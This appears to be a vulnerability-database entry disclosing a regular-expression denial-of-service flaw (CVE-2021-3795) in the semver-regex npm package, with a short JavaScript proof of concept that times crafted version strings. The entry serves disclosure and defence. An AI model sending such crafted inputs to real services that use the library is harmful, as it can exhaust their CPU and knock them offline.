Lucene search
Yetingli006624E3-35AC-448F-AAB9-7B5183F30E28HistorySep 10, 2021 - 12:09 p.m.
Inefficient Regular Expression Complexity in sindresorhus/semver-regex
2021-09-1012:09:00
yetingli
www.huntr.dev
11
0.001 Low
EPSS
Percentile
45.8%
✍️ Description
It allows cause a denial of service when formatting crafted invalid semver versions.
🕵️♂️ Proof of Concept
// PoC.mjs
import semverRegex from 'semver-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '0.0.0-0' + '.-------'.repeat(i*1) + '@';
semverRegex().test(attack_str );
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
Related
veracode
veracode
Regular Expression Denial Of Service (ReDoS)
2021-09-16 04:00:40
cve
cve
CVE-2021-3795
2021-09-15 17:15:10
redhatcve
redhatcve
CVE-2021-3795
2021-09-20 17:46:53
osv
osv
semver-regex Regular Expression Denial of Service (ReDOS)
2021-09-20 20:42:25
CVE-2021-3795
2021-09-15 17:15:10
prion
prion
Design/Logic Flaw
2021-09-15 17:15:00
github
github
semver-regex Regular Expression Denial of Service (ReDOS)
2021-09-20 20:42:25
cvelist
cvelist
nvd
nvd
CVE-2021-3795
2021-09-15 17:15:10
